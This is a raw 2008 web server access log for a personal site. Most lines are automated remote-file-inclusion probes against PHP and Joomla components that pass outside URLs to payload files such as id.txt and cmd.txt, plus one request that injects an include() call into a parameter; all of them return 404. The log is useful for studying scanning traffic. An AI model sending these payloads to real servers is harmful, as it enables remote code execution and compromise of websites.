66.63.166.23 - - [29/Jul/2008:07:44:07 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.68"
66.63.166.23 - - [29/Jul/2008:07:44:07 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.68"
64.230.93.232 - - [29/Jul/2008:07:44:15 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
64.230.93.232 - - [29/Jul/2008:07:44:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
64.230.93.232 - - [29/Jul/2008:07:44:17 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
64.230.93.232 - - [29/Jul/2008:07:44:17 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
64.230.93.232 - - [29/Jul/2008:07:44:17 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
64.230.93.232 - - [29/Jul/2008:07:44:17 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
74.52.139.226 - - [29/Jul/2008:07:44:21 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.52.139.226 - - [29/Jul/2008:07:44:21 -0500] "GET //e404.php?DOCUMENT_ROOT=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.220.163.9 - - [29/Jul/2008:07:44:35 -0500] "GET /logs//config/config_admin.php?INC=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:07:44:36 -0500] "GET //config/config_admin.php?INC=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:07:44:44 -0500] "GET /logs//config/config_admin.php?INC=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:07:44:44 -0500] "GET //config/config_admin.php?INC=http://www.cepeduc.com/cepa/images/M.images/idscan6??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
81.169.182.202 - - [29/Jul/2008:07:44:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrM.txt?? HTTP/1.1" 404 331 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
81.169.182.202 - - [29/Jul/2008:07:44:46 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrM.txt?? HTTP/1.1" 404 336 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
62.75.240.22 - - [29/Jul/2008:07:46:02 -0500] "GET /logs/access_log.1212883200/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:07:46:02 -0500] "GET /view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:07:46:02 -0500] "GET /logs/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
88.84.151.157 - - [29/Jul/2008:07:46:26 -0500] "GET /logs/access_log.1212883200//errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.44.234.103 - - [29/Jul/2008:07:47:36 -0500] "GET /logs/access_log.1207785600///modules/Neos_Chronos/header.php?base_folder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:47:36 -0500] "GET /logs///modules/Neos_Chronos/header.php?base_folder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:47:36 -0500] "GET ///modules/Neos_Chronos/header.php?base_folder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
72.3.138.50 - - [29/Jul/2008:07:47:39 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:07:47:39 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
77.222.40.151 - - [29/Jul/2008:07:47:40 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:47:41 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.44.234.103 - - [29/Jul/2008:07:47:41 -0500] "GET /logs/access_log.1214438400///modules/Neos_Chronos/header.php?base_folder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
88.84.151.157 - - [29/Jul/2008:07:48:57 -0500] "GET /logs//config.php?path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:48:58 -0500] "GET //config.php?path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.53.240.146 - - [29/Jul/2008:07:49:19 -0500] "GET /logs//s_e404.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
74.53.240.146 - - [29/Jul/2008:07:49:19 -0500] "GET //s_e404.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.191.65.95 - - [29/Jul/2008:07:49:19 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.whoisde.de""Mozilla/5.0 (compatible; http://www.whoisde.de/2.1; +http://www.whoisde.de)"
88.84.151.157 - - [29/Jul/2008:07:49:28 -0500] "GET /logs/access_log.1213315200//errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
66.216.91.89 - - [29/Jul/2008:07:49:48 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:07:49:48 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
88.84.151.157 - - [29/Jul/2008:07:50:03 -0500] "GET /logs/access_log.1213142400//errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
64.119.177.12 - - [29/Jul/2008:07:50:33 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:07:50:33 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.30.194.70 - - [29/Jul/2008:07:50:52 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.30.194.70 - - [29/Jul/2008:07:50:52 -0500] "GET /logs/access_log.1210291200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.30.194.70 - - [29/Jul/2008:07:50:52 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.30.194.70 - - [29/Jul/2008:07:51:06 -0500] "GET /logs/access_log.1212278400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
193.207.106.54 - - [29/Jul/2008:07:51:26 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:07:51:26 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
218.188.197.136 - - [29/Jul/2008:07:51:37 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.188.197.136 - - [29/Jul/2008:07:51:37 -0500] "GET //e404.php?DOCUMENT_ROOT=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
62.75.240.22 - - [29/Jul/2008:07:52:09 -0500] "GET /logs/access_log.1212883200/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:07:52:10 -0500] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.75.240.22 - - [29/Jul/2008:07:52:10 -0500] "GET /logs/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.73.188.36 - - [29/Jul/2008:07:52:10 -0500] "GET /logs/access_log.1213142400%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1213142400%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1213142400&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E69.61.106.42%20-%20-%20[10/Jun/2008:19:00:08%20-0500]%20%22GET%20/logs/modules/postguestbook%20...%20HTTP/1.1%22%20404%20333%20%22-%22%22libwww-perl/5.812%22%2062.195.111.119%20-%20-%20[10/Jun/2008:19:03:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1213142400%3C/span%3E%20-%20%3Cem%3E533k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu._sEY9IpY4A4fBXNyoA;_ylu=X3oDMTB0OWswOGQwBHNlYwNzcgRwb3MDMjk0BGNvbG8DYWMyBHZ0aWQD/SIG=133o156pj/EXP=1217422188/**http%3a/www.softnull.com/2007/03/31/print%3apage,1,joomla_component_rwcards.html//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 469 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:07:52:10 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:07:52:10 -0500] "GET /logs/access_log.1213142400%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1213142400%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1213142400&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E69.61.106.42%20-%20-%20[10/Jun/2008:19:00:08%20-0500]%20%22GET%20/logs/modules/postguestbook%20...%20HTTP/1.1%22%20404%20333%20%22-%22%22libwww-perl/5.812%22%2062.195.111.119%20-%20-%20[10/Jun/2008:19:03:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1213142400%3C/span%3E%20-%20%3Cem%3E533k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu._sEY9IpY4A4fBXNyoA;_ylu=X3oDMTB0OWswOGQwBHNlYwNzcgRwb3MDMjk0BGNvbG8DYWMyBHZ0aWQD/SIG=133o156pj/EXP=1217422188/**http%3a/www.softnull.com/2007/03/31//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 469 "-""libwww-perl/5.810"
77.222.40.151 - - [29/Jul/2008:07:52:13 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.50.0.218 - - [29/Jul/2008:07:52:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
77.222.40.151 - - [29/Jul/2008:07:52:13 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.50.0.218 - - [29/Jul/2008:07:52:14 -0500] "GET /phphtml.php?htmlclass_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
77.222.40.151 - - [29/Jul/2008:07:52:16 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:52:16 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.106.241.204 - - [29/Jul/2008:07:52:27 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.106.241.204 - - [29/Jul/2008:07:52:28 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.73.188.36 - - [29/Jul/2008:07:52:36 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:07:52:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
84.33.1.189 - - [29/Jul/2008:07:53:02 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
84.33.1.189 - - [29/Jul/2008:07:53:03 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
72.232.71.106 - - [29/Jul/2008:07:54:13 -0500] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://mtalawla.com//modules/My_eGallery/idd.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
72.232.71.106 - - [29/Jul/2008:07:54:13 -0500] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://mtalawla.com//modules/My_eGallery/idd.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
72.232.71.106 - - [29/Jul/2008:07:54:13 -0500] "GET /logs/access_log.1216252800/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://mtalawla.com//modules/My_eGallery/idd.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
213.206.113.104 - - [29/Jul/2008:07:54:49 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.spacetv.ru/admin/_files/geotraffic/osid6.txt%0D?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
213.206.113.104 - - [29/Jul/2008:07:54:49 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.spacetv.ru/admin/_files/geotraffic/osid6.txt%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
213.206.113.104 - - [29/Jul/2008:07:54:49 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.spacetv.ru/admin/_files/geotraffic/osid6.txt%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
72.232.71.106 - - [29/Jul/2008:07:54:56 -0500] "GET /logs/access_log.1216598400/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://mtalawla.com//modules/My_eGallery/idd.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
74.6.18.231 - - [29/Jul/2008:07:55:32 -0500] "GET /logs/access_log.1164931200 HTTP/1.0" 200 157274 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.99.76.3 - - [29/Jul/2008:07:55:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:07:55:45 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
194.79.75.195 - - [29/Jul/2008:07:55:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:55:47 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
89.111.179.12 - - [29/Jul/2008:07:56:03 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:07:56:03 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
194.79.75.195 - - [29/Jul/2008:07:56:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:56:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
217.20.116.93 - - [29/Jul/2008:07:57:16 -0500] "GET /logs/access_log.1214438400//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.0" 404 323 "-""libwww-perl/5.48"
217.20.116.93 - - [29/Jul/2008:07:57:16 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.0" 404 296 "-""libwww-perl/5.48"
217.20.116.93 - - [29/Jul/2008:07:57:16 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.0" 404 301 "-""libwww-perl/5.48"
75.125.143.162 - - [29/Jul/2008:07:57:40 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
75.125.143.162 - - [29/Jul/2008:07:57:40 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
74.50.13.190 - - [29/Jul/2008:07:57:46 -0500] "GET /logs/access_log.1212883200/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
74.50.13.190 - - [29/Jul/2008:07:57:46 -0500] "GET /view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.812"
74.50.13.190 - - [29/Jul/2008:07:57:47 -0500] "GET /logs/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
212.50.0.218 - - [29/Jul/2008:07:57:54 -0500] "GET /phphtml.php?htmlclass_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
81.169.185.238 - - [29/Jul/2008:07:58:38 -0500] "GET /logs//gallery/displayCategory.php?basepath=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.169.185.238 - - [29/Jul/2008:07:58:38 -0500] "GET //gallery/displayCategory.php?basepath=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
201.36.250.17 - - [29/Jul/2008:07:58:56 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
201.36.250.17 - - [29/Jul/2008:07:58:57 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
69.73.188.36 - - [29/Jul/2008:07:59:33 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:07:59:34 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:07:59:34 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
201.218.250.106 - - [29/Jul/2008:07:59:37 -0500] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
201.218.250.106 - - [29/Jul/2008:07:59:37 -0500] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
201.218.250.106 - - [29/Jul/2008:07:59:38 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
201.218.250.106 - - [29/Jul/2008:07:59:38 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
89.106.241.204 - - [29/Jul/2008:08:00:35 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.106.241.204 - - [29/Jul/2008:08:00:35 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.121.143.183 - - [29/Jul/2008:08:00:38 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
91.121.143.183 - - [29/Jul/2008:08:00:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
207.213.245.1 - - [29/Jul/2008:08:00:46 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:08:00:46 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:08:00:48 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:08:00:49 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:08:00:56 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
